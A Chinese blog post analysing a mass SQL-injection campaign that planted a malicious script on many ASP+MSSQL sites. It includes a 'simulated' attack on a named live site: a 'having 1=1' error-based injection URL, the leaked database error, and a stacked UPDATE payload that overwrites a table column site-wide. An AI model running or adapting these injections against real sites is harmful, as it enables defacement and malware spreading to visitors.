. 首先在网上找到了这次攻击新闻报道
http://www.nsfocus.net/s/6697
http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html
通过GOOGLE搜索到了相关被黑页面
http://www.google.cn/search?hl=zh-CN&q=site%3Atrendmicro.comwww.2117966.net+fuckjp.js&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f
趋势科技页面被插入过http://www.2117966.net/fuckjp.js相关JS挂马
2. 直接查找这个JS相关信息
http://www.google.cn/search?complete=1&hl=zh-CN&window=1&q=www.2117966.net+fuckjp.js&meta=&aq=f
发现了12,500项符合结果这些返回结果信息都是当前页面被插入了JS挂马
通过分析发现被黑页面都有如下特征:
1.被修改页面网站WebSite都是ASP+MSSQL架构
2.被修改页面都存在SQL注入漏洞
3. 取了其中个被挂马页面做了SQL注入挂马模拟攻击:
1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162
这个链接存在明显SQL注入,对person参数注入语句having 1=1,将暴出当前页面注入点表名为coordinator字段名ShCoordinatorSurame
http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1
—————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
—————————-
2. 修改暴出当前页面表名字段名内容为插入JS代码来实现挂马
http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator ShCoordinatorSurame=’’ where 1=1––
修改coordinator 表 ShCoordinatorSurame 字段内容为,同时设个1=1为真逻辑条件就可以修改当前页面查询数据内容.
就可以实现在有SQL注入点页面直接挂马
4.整理总结.
这次大规模攻击流程应该是自动化:
1.通过先进扫描技术批量收集到几万网站WebSiteSQL注入漏洞
2.针对漏洞攻击进行自动化SQL注入挂马
现今虽然SQL注入漏洞已经很老了但是这次黑客在天内同时对数万网站WebSite攻击挂马技术却是很惊人连趋势这样安全公司也未能幸免
最新评论